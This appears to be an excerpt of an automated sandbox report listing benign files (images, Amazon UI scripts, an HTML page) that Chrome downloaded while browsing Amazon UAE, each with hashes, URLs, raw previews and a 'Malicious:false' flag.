                                                                                                                                                                                                        Entropy (8bit):4.19644707821733
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:PouVIZxgRO5ZB1XbZ6iFi:haxUkZ3X96x
                                                                                                                                                                                                        MD5:6AAEF67381946BFC1DDACCA8CF7F6C36
                                                                                                                                                                                                        SHA1:E441BBA8B691AD0FFF0BCCB75974880018AB41D6
                                                                                                                                                                                                        SHA-256:73F8AE8C11DAA6AD905107970E55C3C64CD7133561E9E91E650AAB092BA7245E
                                                                                                                                                                                                        SHA-512:99039B90D4F3819EFB0A395D0DC810DEE1A56265D443D24D1C9BDF832EF9F95887E3C417253698A4F76EF176D0ACE6334905F4B7B4E6A8421D2F650B84255EC2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:<!DOCTYPE html><html><head><title>x</title></head><body></body></html>.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 440 x 440, 8-bit colormap, non-interlaced
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):53473
                                                                                                                                                                                                        Entropy (8bit):7.988700354973617
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:HhQO85Kt23XTmw+XBax3marV+Df+wMjchlvk2:HhQO85k23XTmwIB43m0+z+weWBR
                                                                                                                                                                                                        MD5:0FB6944ACEC4E40518B2ECF15E4CC802
                                                                                                                                                                                                        SHA1:A4388226B837A50770F2DDB5FD35BDA24F5AF6E8
                                                                                                                                                                                                        SHA-256:E00FEC13C48C56548764A28BD68F0AA902B8822B6F49BCA412B1E16F04B44FE0
                                                                                                                                                                                                        SHA-512:C66682A2D505E017C48F578A982727840C94DDCDF568704251E10457A0DEEA3AAA421B7B2E9CEFD1E5A1E95DEADAD06077D4AF1CC72348E96EEE576469A19945
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/G/39/electronic/kamja/Events/2024/BTS24/PH1/Nav/OFC/bts_ofc_02_school_en._CB568181090_.png
                                                                                                                                                                                                        Preview:.PNG........IHDR.....................PLTE..U..............S.....T..............V".=.....R...........M........O%1@(4C....*9.....Y.t....................h~...................k.....x.....%5.]u......... 0..L.cx....]s.}....#..(....{.....m......M.G^.......[j.8E.c~....Xn..........Pi..p....Un.......ds....Mc.~..LX............DZ............Sa.........Ti.....,....Ld...z....h.....DP....t....t..y.........N_......n......u..........g..@R..i.....".......z..\.......|.....<K....EV..........Na............m...........e.2>..w....~.....Ybm...4..Q....t.=GT..].......d............~.....8H.m.......|.3>K......NXeP..}..kv~..{..a...w.........cmx......'....<...M..FR\....0...v....d...X.+...ds;..|..'....p.)4......B....rs...Q..n..S.I..Z....S.R].....*.......6...m..#s...j.vc.....z....Ey.\l.%.... .IDATx..?h[Y.......<.......1.H.B..t..d ...4...m..Z...2..).m.6(S..k....p........r..{.....20.{-K.=.Y..}.;..5...o.....zkkk.K..2?.J.......&.z.v..kg..K...V..MK.....<M.2a).hi..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):68782
                                                                                                                                                                                                        Entropy (8bit):7.976825743641747
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:rIZGY8i4nqkvDYubQwqNAUnF5CQLPqIPl9IAXkK4zwxZ62Y:rhuoXbYcdc3FbjqIt9F4zwj6F
                                                                                                                                                                                                        MD5:D4F855A97CE69E0B4359AB927EC28574
                                                                                                                                                                                                        SHA1:6FE0487FA6ADBCAEDF60DBFB8086C001C0292307
                                                                                                                                                                                                        SHA-256:19B9598112754CE0A2612686ABC08BA18981C528FC3189C6AAAB4087ADB855E6
                                                                                                                                                                                                        SHA-512:9E9775C21FBBD3F119569B94416DB3809CE68FB39726A514FE87560F7034EBECFE7019DBA6E920DAB8602F1022E65D77CD6F7B7570C62E5FA846A45E27FECA75
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF......................................................................................................................................................................;.................................................................................`..0...@.YoQ......q....|~./?.Z.~u.....d..w\................<9a...c.^..69....d.........Fj..(u.a...............o....vEhc.zN.........v.....LK.'.\i@...........m...@.!.............X.L...JYi.._.........k...y.+1............/.mw<}&.}.`c ......G...w...............9K.....)..7......."......H....@..........~..2'.p...<.........-.a.......5.....V.......|..;....c.W=.....e7#....4.....@.."..........3'u'...!..D..%6..........b.(.0'Tv....;E...<...~.....n......|...~.t..;.........&...9..64..1oqm%.............O.M"d...t.....L..<...}....d.......h.=.*..<...>....$..c~...+....{~#......=...8N.R......K...........!u..._!.~.x.......#&.0...O.q....j......<.?.]...^.....a........l..1.w...Kj./.L..WO).... <..............f>..oowX......".O...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (531)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):1406
                                                                                                                                                                                                        Entropy (8bit):5.225394152309612
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:2T/sWFxVPIVq4pgY2Gq4pGBq4pA6ZfLZq2G97doVl6yeIIr5s66TU0ttoO:IFxu98BLPGRdoV8yeImf6TB9
                                                                                                                                                                                                        MD5:58F0FEDF5D8FC4BFA2E0841607D6EF40
                                                                                                                                                                                                        SHA1:CB25320DC51C8EC3E664057F39ACD4829D0FEBE2
                                                                                                                                                                                                        SHA-256:8D1569345AA7C0E58BE0571BA51676058515949F2BAE328D9D0A3304F73D8E31
                                                                                                                                                                                                        SHA-512:061CCDF6C8994CFD70BF137B6899C850AFBA8A9B78563FB069361D0A7C190650E42A17A3448DDFA179B32A0D7417F8D48F77B6E5DD7CB0A8CCC4E127F78B3227
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/I/0152SLDk8CL.js?AUIClients/OctopusBrowsePageAssets
                                                                                                                                                                                                        Preview:(function(d){var c=window.AmazonUIPageJS||window.P,g=c._namespace||c.attributeErrors,a=g?g("OctopusBrowsePageAssets",""):c;a.guardFatal?a.guardFatal(d)(a,window):a.execute(function(){d(a,window)})})(function(d,c,g){d.when("jQuery","ready").execute("apb-browse-refinements-checkbox-handler",function(a){a(".apb-browse-refinements").delegate(".apb-browse-refinements-checkbox","click",function(d){var b=a(d.currentTarget).closest("a").attr("href");b&&"#"!==b&&(d.preventDefault(),c.location.href=b)})});."use strict";d.when("A","jQuery","ready").execute("s-filters-declarative-action",function(a,d){a.declarative("s-nav-ref-image-layout-hover","mouseenter mouseleave",function(b){var f=b&&b.data,e=d(":first-child",b&&b.$currentTarget),a=null,c=null;b=b||{};"mouseenter"===b.type?(a=f.hoverOffsetX,c=f.hoverOffsetY):"mouseleave"===b.type&&(a=f.offsetX,c=f.offsetY);null!==a&&e.css("background-position",[a,"px ",c,"px"].join(""))})});"use strict";d.when("A","GLUXWidget").execute(function(a,d){a.on("pa
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 13 x 25, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):538
                                                                                                                                                                                                        Entropy (8bit):7.363900406422438
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:6v/7r/6TBLr8CzfiF2PuKoSpH/geL6Ou4zlWkqMlMQn9inLjj5N:i/6FLlzu8kSdg3GNqMlGr5N
                                                                                                                                                                                                        MD5:3920E1FFC5AB160D1D7F18D8D6303633
                                                                                                                                                                                                        SHA1:53390E776D482DB9E85814A752276F517523724C
                                                                                                                                                                                                        SHA-256:3F8C75CC2824A1CE825FF2623763046C497B7D06587C14A07FD775F7506BCDA5
                                                                                                                                                                                                        SHA-512:5F368C2EFCA94B7021CC693CE95C9A598EEAAFF83072E2D14FF6A6EFE272A07B9301536237EE263E398D87CBE1E72879D11CC6EB443211C99118FB88E85CF35C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR...................pHYs.................tIME.......}.......bKGD..............IDAT8...n.0.E.V....J...@..........f&...'@.[.202..d...$*[:"..Vv..Z.z..N.....V.q6....P.X,.r.,;E.....L.S..#.c..y.=.'..h.).....!.....`.........BR....#.)PdP... ....4............:.f.Z.....4...A..<..y.....N.....,..\.!.L..v...1]...d...t....*i..5.A....(.......O,..E.o...RM.....h4..j.*..JU.\/t..j/P.$........z=...C..&y...z-.9b..*!B..(...=U...B.J..M..,!n..............!u...x+.u.B'....=...j..O..{.E.*~{...j...?......J.T....IEND.B`.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (14498)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):327859
                                                                                                                                                                                                        Entropy (8bit):5.68990174313664
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:bLfDxL4esFz9cGknU8mJUR4ItX829cH4bvLsAEbRUm21FeBIQT:bLf26Gknr3R4ItX829BvLQbRUmGF6
                                                                                                                                                                                                        MD5:3985528FF1F04477D3F75EDA0C0EB40D
                                                                                                                                                                                                        SHA1:CEA8F8094D094431F1BD05C7E9B6E321AF12E82B
                                                                                                                                                                                                        SHA-256:2455DFFDA52956C766B90D4ADDDB5EFBE29ABC40220B4189D72F19065B7E47C5
                                                                                                                                                                                                        SHA-512:1468FE439A75DE0B737723D0E448C405848E4FA129F32692EB199F6BCFC10CBDB82EF07F65C905E772B73F6BAB3BAC9B350EB1FCD7AAE8DFE92E608339748D9C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.amazon.ae/customer-preferences/edit?ie=UTF8&preferencesReturnUrl=%2F&ref_=topnav_lang
                                                                                                                                                                                                        Preview:<!doctype html><html lang="en-ae" class="a-no-js" data-19ax5a9jf="dingo"> sp:feature:head-start -->.<head><script>var aPageStart = (new Date()).getTime();</script><meta charset="utf-8"/>. sp:end-feature:head-start -->. sp:feature:csm:head-open-part1 -->..<script type='text/javascript'>var ue_t0=ue_t0||+new Date();</script>. sp:end-feature:csm:head-open-part1 -->. sp:feature:cs-optimization -->.<meta http-equiv='x-dns-prefetch-control' content='on'>.<link rel="dns-prefetch" href="https://images-eu.ssl-images-amazon.com">.<link rel="dns-prefetch" href="https://m.media-amazon.com">.<link rel="dns-prefetch" href="https://completion.amazon.com">. sp:end-feature:cs-optimization -->. sp:feature:csm:head-open-part2 -->.<script type='text/javascript'>.window.ue_ihb = (window.ue_ihb || window.ueinit || 0) + 1;.if (window.ue_ihb === 1) {..var ue_csm = window,. ue_hob = +new Date();.(function(d){var e=d.ue=d.ue||{},f=Date.now||function(){return+new Date};e.d=function
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (391)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):2073
                                                                                                                                                                                                        Entropy (8bit):5.5217451089062894
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:uQtgok9mgoksITlvsduD3uD1uD1uDs+gEvW2oNo/OcXRsaRdOXduSYpSzJS:uQ+3f3lh0UDeDsDsD8EO3+/OciaRdYJe
                                                                                                                                                                                                        MD5:07F3BBAE3312B76D3A76B274E03D3F0C
                                                                                                                                                                                                        SHA1:2D85782448AD21736AA6093D3FC5D02C48A91591
                                                                                                                                                                                                        SHA-256:C47691A714391803F4A58CB0400DB014EF031FA64EA282235BE2035299707EEB
                                                                                                                                                                                                        SHA-512:C93FE5EAD1424F7D4632799DE34AD06A35E23763E28142E7A0A4337F430F0E43D3AC858B4B518945DF89E0CD0FA174462F12A594D5791BBDD120E4FD84418106
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://static.siege-amazon.com/prod/profiles/AuthenticationPortalSigninEU.js
                                                                                                                                                                                                        Preview:(function(f) {. var haveAUI = typeof P !== 'undefined' && P.AUI_BUILD_DATE;. if (typeof SiegeCrypto !== 'undefined') {. if (haveAUI) {. P.now('siege-cse').register('siege-cse:profile:AuthenticationPortalSigninEU', function(lib) {. return f(lib || SiegeCrypto);. });. } else {. f(SiegeCrypto);. }. } else if (haveAUI) {. P.when('siege-cse').register('siege-cse:profile:AuthenticationPortalSigninEU', f);. } else {. var err = new Error('CSE library not loaded, and no AUI');. try {. ueLogError(err, {attribution: 'siege-cse:profile:AuthenticationPortalSigninEU', logLevel: 'WARN'});. } catch (e) {. throw err;. }. }.})(function(SiegeCrypto) {..SiegeCrypto.addProfile("AuthenticationPortalSigninEU", {. "password": {dataType: "AuthPortalSigninPasswordEU", requiresTail: false},. "passwordCheck": {dataType: "AuthPortalSigninPasswordEU", requiresTail: false},. "passwordNew": {dataType: "AuthPortalSigninPasswordEU", requiresTail: false},.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):1943
                                                                                                                                                                                                        Entropy (8bit):7.708840863704724
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0rdBqdoYsrKFX8WFBZvI9/dBGn7dX8+cBpIHvMEQK:TLoYsMdbIbU7dbzkE3
                                                                                                                                                                                                        MD5:D9060BE841CCBE9F731CC81DB21187E0
                                                                                                                                                                                                        SHA1:309E8A9A5311A1968FC7BB5010FB60C1A79B2FE5
                                                                                                                                                                                                        SHA-256:2D4D220FFF6C004F9BA48301752EE396F6D1FBC008790543B3A1A9DED64B65E4
                                                                                                                                                                                                        SHA-512:F03A606E537A0795D5E55BDD6D03A2172F810A926F7552919E993D384FC29EBAB248C382D4450E479F8B6E0C7004EBB25BE97D7638D522C13FA4C02C97E1D42F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_Audio_1x._SY116_CB659040198_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..........~......................................................!1AQ.aq."R....#....B.23Dr............................................!............?..............5UQQ.-EC.qD._#...:..u..jd....dq.SL..$..........o..oc...J.......Ai.[o....%..7.p.?.7. .R..."." ""." ""." /@^-a..\.1d..r.... ....x=....s....}....Q.4...G*.[...3.w<~...}Ed..RG....`....S+d.(m.8.wX.;.b.w({>N..91VQ.Rh.....H..n.n......@k*.3_.l/$0..Oc.=.f.Ui;.w8........-..c.....Fr..i..2.......:r.?zV7.,.%.DD.D@DD.D@DD......=.{...b..&z.....3.%..e}....{.b.L...........y...=...*.kul.I.Z.*.......C.!...V....&..s.%.&w.I.!.m41.6..4..|B......;.M=..6;.Pu...c.`/*-...O.a.....i; ....z..../.4.......^...DD.D@DD.D@E....'o.....(......q......(}.-.._E@7..*#nKH..p. .;.%m..j.K...G?...6&.{.../...<....zf..P.f..)...HfK.Y..nr.WC.A.c..@..@....^...lN,..D.li3<z..aFMq....."..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (665)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):276717
                                                                                                                                                                                                        Entropy (8bit):5.353438150363169
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:ZYIIAmk1Xaq/LTCz6PHaL5gYI5B6iSVMbN/vYSidNII:ZjP6LWY6bNXYSidNII
                                                                                                                                                                                                        MD5:3C66F4A874169140AE54522A79932AB8
                                                                                                                                                                                                        SHA1:BAE14697244A517EC3626011DB3B7D5842776A1A
                                                                                                                                                                                                        SHA-256:5B153D0DE899A912C5D4E38C154D2F24D972413566B6C45BB0C26C4B79C46949
                                                                                                                                                                                                        SHA-512:8FDE61B2CD52D7BD59C745AE11CD0F3B4226C2260B6CF0BB1FF979C8666CCC0DE76AB452ADC40C74A41822C26394AB8085A8EF10947E874998F36BA82657E3A8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(function(a){var c=window.AmazonUIPageJS||window.P,d=c._namespace||c.attributeErrors,b=d?d("AmazonUIBaseJS@analytics","AmazonUI"):c;b.guardFatal?b.guardFatal(a)(b,window):b.execute(function(){a(b,window)})})(function(a,c,d){"use strict";a.register("a-analytics",function(){function b(b,f){var a=c&&c.ue&&c.ue.count;if(a&&b){var e="aui:"+b;1<arguments.length&&a(e,f);return a(e)}}var a=c&&c.ue&&c.ue.tag;return{increment:function(a,f){if(a){var c=b(a)||0;b(a,c+(f||1))}},count:b,logError:function(a,f,b){c.ueLogError&&.c.ueLogError({message:a},{logLevel:f,attribution:b})},tag:function(b){a&&b&&a("aui:"+b)}}});a.when("a-analytics").register("prv:a-cache-analytics",function(a){function b(a){var b=a.name.indexOf("AUIClients/AmazonUI");a=a.name[b+19];a=a===d||"\x26"===a||"#"===a;return-1!==b&&a}function e(b){a.tag(("script"===b.initiatorType?"js":"link"===b.initiatorType?"css":"unknown")+":"+(b.transferSize===d||b.decodedBodySize===d?"unknown":0===b.transferSize&&0<b.decodedBodySize?"cache":0<b.t
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 226x200, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):8803
                                                                                                                                                                                                        Entropy (8bit):7.922544542482178
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:jJqDW91wyB1NOgy9mXrAEHDfq2kwgcr24lf1joABf4YOeGky3XYpUc8uZ:kDW9fB1NQMXZjftkw3r24lfpoAKfg6uZ
                                                                                                                                                                                                        MD5:5450C8BADB1EE08FF4F4591751FE3A5D
                                                                                                                                                                                                        SHA1:7AA4E13E3854468EADCA584FAA60CC25A3DDB40B
                                                                                                                                                                                                        SHA-256:07F34C3DF184743290BB57D71E9EFC80F03947BF4A58D81ED5F6396B0724E045
                                                                                                                                                                                                        SHA-512:9D76F94520B38492003206D18E0F3620B49CF5AE691A0D8C886A1AE672A39004FFA46C75B462AFD25373B5E29561172D65F55574B67198E7B00EAF688D81CFEC
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."......................................................................"8...!4...!.s..4..G).;x.\.3;......99.Q.xe.......p(.fK..~L`&..^$.....$..s.7e.......Ca.G...!:....>.|..8r.. s..>_.-.N....)7.O.d.L....s....8P......=.....d/d.$w0...s.....B.]..+...;..'N(O..F.....eRY........I./...IL..q...2:rt...3F....B......."t.0..`.+.5..O..P.g..F.6)A3WT.;.'...w.7.n.....wE.F.G.>..6s@X...Y....<d7`Vc.B...(....e.%P...n........#.N.. ..8(.N..S.......x...H._.;9..U.R....(2Q...j..e...=.9._2....Y.P..`.+......v.p..nK.....#...KJ.!a.y...yY..U.Y...s.PI.......3.>z.p."......!F..H.s\'A,..=..]..jd....83..N \...%...........L2...4.b.%a...)...j.h.6......_`....y........x=.d..,6.!.r.../...... 2.+0>..F..i....2.i.....#..H.I......@4.....,I.c.,....?...(........................!1A.. 2Q".#3aR...................~..o..~.B.._.(..1.%..L.....2...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fls-eu.amazon.ae/1/batch/1/OP/A2VIGQ35RCS4UG:258-1179333-9864664:646E5TEYAMSGQRNCHWPV$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.295223.0%26id%3D646E5TEYAMSGQRNCHWPV%26sc0%3Daui%3Asw%3Appft%3Acallback_ricb%26bb0%3D71%26pc0%3D1088%26ld0%3D1088%26t0%3D1723729095602%26sc1%3Dportal-bb%26pc1%3D63%26ld1%3D63%26t1%3D1723729095694%26sc2%3Dcarousel-v2_apb-browse_5%26bb2%3D1306%26be2%3D1337%26pc2%3D7276%26ld2%3D7276%26t2%3D1723729101790%26sc3%3Dsobe_logof_d_b_%26bb3%3D1407%26cf3%3D1410%26pc3%3D1411%26ld3%3D1411%26t3%3D1723729095925%26sc4%3Dcarousel-v2_apb-browse_12%26bb4%3D1377%26be4%3D1381%26pc4%3D7276%26ld4%3D7276%26t4%3D1723729101790%26sc5%3DcsmCELLSframework%26bb5%3D6777%26pc5%3D6777%26ld5%3D6777%26t5%3D1723729101291%26sc6%3DcsmCELLSpdm%26bb6%3D6777%26pc6%3D6781%26ld6%3D6781%26t6%3D1723729101295%26sc7%3DcsmCELLSvpm%26bb7%3D6781%26pc7%3D6781%26ld7%3D6781%26t7%3D1723729101295%26sc8%3DcsmCELLSfem%26bb8%3D6781%26pc8%3D6781%26ld8%3D6781%26t8%3D1723729101295%26sc9%3Due_sushi_v1%26bb9%3D6782%26pc9%3D6782%26ld9%3D6782%26t9%3D1723729101296%26ctb%3D1:11400
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):2862
                                                                                                                                                                                                        Entropy (8bit):7.799516625655038
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT0r6/jkNDhZCF6JY/4iOhUvbsbvQKT4T+RQJBP31gWNEhuUkTLF9xPXIWwTrA2:T3YN+Fj/47h6bs0ZDJzEhuDl9JIP
                                                                                                                                                                                                        MD5:5EC611E125AD65F19846E814C06E7C15
                                                                                                                                                                                                        SHA1:E7F6AB44B4B659D002AE91125053BAADE51553A7
                                                                                                                                                                                                        SHA-256:91067E8704DC9AD4E56568610B3B4BA213A7BF640D043C8BA1C03981AB45A09A
                                                                                                                                                                                                        SHA-512:196901B52ACE372F3EB0A91237B3340C2EC96CEBE3B414AB302429AF4077A5A20849346603E3AC3C355E5BE505FDED85EF7679CA57B574872516E75F49C785AB
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1717076_3763818_372x232_2X_en_AE._SY116_CB558609315_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..............................................................!..1A."Q.2q....#a..%BR.3Ccr.................................................!...1"Qq.............?..8..<dD@DD.D@DD.D@DD.D@DD.D@DD.D@DD.D@DD.D@J.....O@?S.1.#.....Z...i.xj..;.t._...|....\.g..}......i..V..*EG..T.=y.3.9......=r.M!*.g .J.x.p..).1.......F.{W.i..+.w...@`.ve ..'./....k]..0%...}s....n..~*....K../.5q..W.;..6lc.....?+K....mj..[..R...$....@rd....]....?..q..#.6..i.U.....z..i.?.Rgf|.=>.."%3""." ""." ""." "`.E..M.+.Z.Z.<.R)....w.....olw..4iPN..>........2..............C=tnE.!.....XT.A..j-O.5mN...w..i.~*.A..w...|.......N.}uMb.Y..W... ....U..8..iF...fZ.....w<...:.r.g.\..y3C...)e(..(@.M.....M.._..8.......u...&)B..UZ4...N.4B...UAc..oK.g..aR..Szzm......|.)z`+S.N.I..`...t}W.......^.v.......=D.(....wV.8.........8..i....V.sP.]...."...
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (548)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):15219
                                                                                                                                                                                                        Entropy (8bit):5.408378924173576
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:LA+1NXTmdAVVxLxwEsgiGrdjLKYVu10V4:cGQg9dri
                                                                                                                                                                                                        MD5:10A0F40E0F5C16A5157FF98B7335A887
                                                                                                                                                                                                        SHA1:88627C59520E02536E13761347C845365085186B
                                                                                                                                                                                                        SHA-256:4AFD614399E1B0CDB38015CFDFCC778764F61E8B6B1BB5C73D67829BAB1457C5
                                                                                                                                                                                                        SHA-512:4C472B6BE18186AA86A7798B7A543DFA0494BA51267203A7CC77B490E00EF0BA8F25176B8EB7BADBB3F5329509D2F3E4124ACF542E60110204B5E38F23C49106
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(function(n){var p=window.AmazonUIPageJS||window.P,m=p._namespace||p.attributeErrors,l=m?m("AmazonLightsaberPageAssets",""):p;l.guardFatal?l.guardFatal(n)(l,window):l.execute(function(){n(l,window)})})(function(n,p,m){(function(){var l;(function(c){c.deep=function(a){return JSON.parse(JSON.stringify(a))}})(l||(l={}));var x;(function(c){c.log=function(a){for(var b=1;b<arguments.length;b++);}})(x||(x={}));var q;(function(c){c.isObject=function(a){return!!a&&"object"===typeof a&&!Array.isArray(a)};c.isNonEmptyString=.function(a){return"string"===typeof a&&0<a.length};c.isPositiveInteger=function(a){return"number"===typeof a&&Math.floor(a)===a&&0<=a&&Infinity!==a};c.isFunction=function(a){return"function"===typeof a}})(q||(q={}));var B=this&&this.__awaiter||function(c,a,b,f){function d(a){return a instanceof b?a:new b(function(b){b(a)})}return new (b||(b=Promise))(function(b,g){function e(a){try{r(f.next(a))}catch(t){g(t)}}function h(a){try{r(f["throw"](a))}catch(t){g(t)}}function r(a){a.d
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):11186
                                                                                                                                                                                                        Entropy (8bit):7.839543973889308
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:bb0zxM2/KtAp0XJbvRP/d7wPA/Na3/dqcChJ/3lM3614KF/Hmkl8kl/KtlZjGH/a:bbUxP/Kt+0XJbvp/pTAVqcChJPl861lC
                                                                                                                                                                                                        MD5:93851230F1F19DDA1B08C6FD288F2AA5
                                                                                                                                                                                                        SHA1:7491766486CCE67CC615B3F0A5ED3808B2CEDE37
                                                                                                                                                                                                        SHA-256:1136A249263B45C2593F1E70E1F32D0CC06D70F173608F4FFD5C2E17389D85DF
                                                                                                                                                                                                        SHA-512:691CD21842C53CF1966752E135F279F858DCB63A3B9A284AEAD781769EB70F7CCD3BEF9586DF279B6ECD6F3B85269D4B463683A55881AA11C26FCF6000909608
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:"https://m.media-amazon.com/images/I/31vRRFcgseL._SR480,440_.jpg"
